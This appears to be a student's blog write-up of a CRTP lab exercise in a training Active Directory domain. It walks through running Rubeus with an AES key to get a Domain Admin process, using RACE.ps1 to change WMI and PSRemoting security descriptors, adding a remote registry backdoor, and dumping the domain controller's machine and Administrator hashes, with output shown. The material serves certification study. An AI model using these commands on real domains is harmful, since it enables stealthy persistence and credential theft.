crtp-13 – jaccostraathof

Learning Object 13

Tasks

1 – Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access

2 – Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI

Flag 22 [dcorp-dc] – SDDL string that provides studentx same permissions as BA on root\cimv2 WMI namespace. Flag value is the permissions string from (A;CI;Permissions String;;;SID) 🚩

Solutions

1 – Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access

Remembering that once we have administrative privileges on a machine, we can modify security descriptors of services to access the services without administrative privileges.

First to all start a process as DA:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

So, run as Domain Administrator the following commands to modify the host security descriptors for WMI on the DC to allow student867 access to WMI using RACE toolkit:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\RACE.ps1
Set-RemoteWMI -SamAccountName student867 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

Now, go to a normal student867 shell for checking if we’re able to execute WMI queries on the DC:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\RACE.ps1
gwmi -class win32_operatingsystem -ComputerName dcorp-dc

Next, in a elevated DA shell enable/disableRemotePSRemoting

note: The I/O operation has been aborted is a good sign! that it worked

Set-RemotePSRemoting -SamAccountName student98 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

PS C:\Windows\system32> Set-RemotePSRemoting -SamAccountName student98 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose -Remove
[dcorp-dc.dollarcorp.moneycorp.local] Processing data from remote server dcorp-dc.dollarcorp.moneycorp.local failed
with the following error message: The I/O operation has been aborted because of either a thread exit or an application
request. For more information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (dcorp-dc.dollarcorp.moneycorp.local:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken
PS C:\Windows\system32> Set-RemotePSRemoting -SamAccountName student98 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
[dcorp-dc.dollarcorp.moneycorp.local] Processing data from remote server dcorp-dc.dollarcorp.moneycorp.local failed
with the following error message: The I/O operation has been aborted because of either a thread exit or an application
request. For more information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (dcorp-dc.dollarcorp.moneycorp.local:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken
PS C:\Windows\system32>

Invoke-Command -ScriptBlock{$env:username} -ComputerName dcorp-dc.dollarcorp.moneycorp.local

PS C:\Users\student98> Enter-PSSession -ComputerName dcorp-dc
[dcorp-dc]: PS C:\Users\student98\Documents>

Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student867 -Verbose

2 – Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI

We’ve already inject Silver Ticket into previous tasks, so we can test as a normal user

gwmi -Class win32_operatingsystem -ComputerName dcorp-dc

. C:\AD\Tools\RACE.ps1

Get-RemoteMachineAccountHash -Computername dcorp-dc -Verbose

PS C:\Users\student98> gwmi -Class win32_operatingsystem -ComputerName dcorp-dc

SystemDirectory : C:\Windows\system32
Organization    :
BuildNumber     : 20348
RegisteredUser  : Windows User
SerialNumber    : 00454-30000-00000-AA745
Version         : 10.0.20348

PS C:\Users\student98> . C:\AD\Tools\RACE.ps1
PS C:\Users\student98> Invoke-Command -ScriptBlock{$env:username} -ComputerName dcorp-dc.dollarcorp.moneycorp.local
student98
PS C:\Users\student98> Get-RemoteMachineAccountHash -Computername dcorp-dc -Verbose
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: LSA Key        : BDC807FEC0BB38EB0AE338451573904220F8B69404F719BDDB03F8618E84005C

ComputerName MachineAccountHash
------------ ------------------
dcorp-dc     063ab4a986a9f571ffac3df4b231366a


PS C:\Users\student98> Enter-PSSession -ComputerName dcorp-dc
[dcorp-dc]: PS C:\Users\student98\Documents>

Get-RemoteLocalAccountHash -Computername dcorp-dc -Verbose

PS C:\Users\student98> Get-RemoteLocalAccountHash -Computername dcorp-dc -Verbose
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: HBootKey : 3A7C1B66C61B8E967267FA0CB9D560265774BB4ACA899D52D1DC5ADD11C20C19


ComputerName : dcorp-dc
UserName     : Administrator
UserRID      : 500
UserLMHash   : f618da2acca75dbd3afd9486927b2f05
UserNTLMHash : 24275a16f48a1ad2580f4146ba1d192c
....

Flag 22 [dcorp-dc] – SDDL string that provides studentx same permissions as BA on root\cimv2 WMI namespace. Flag value is the permissions string from (A;CI;Permissions String;;;SID) 🚩

whoami /user

this is our SID: S-1-5-21-719815819-3726368948-3917688648-20607

The flag regards the permissions string from (A;CI;Permissions String;;;SID): CCDCLXXXXXXXXXXX

reference used : https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemotePSRemoting.ps1

Previous12 – LO1️2️ Next14 – LO1️4️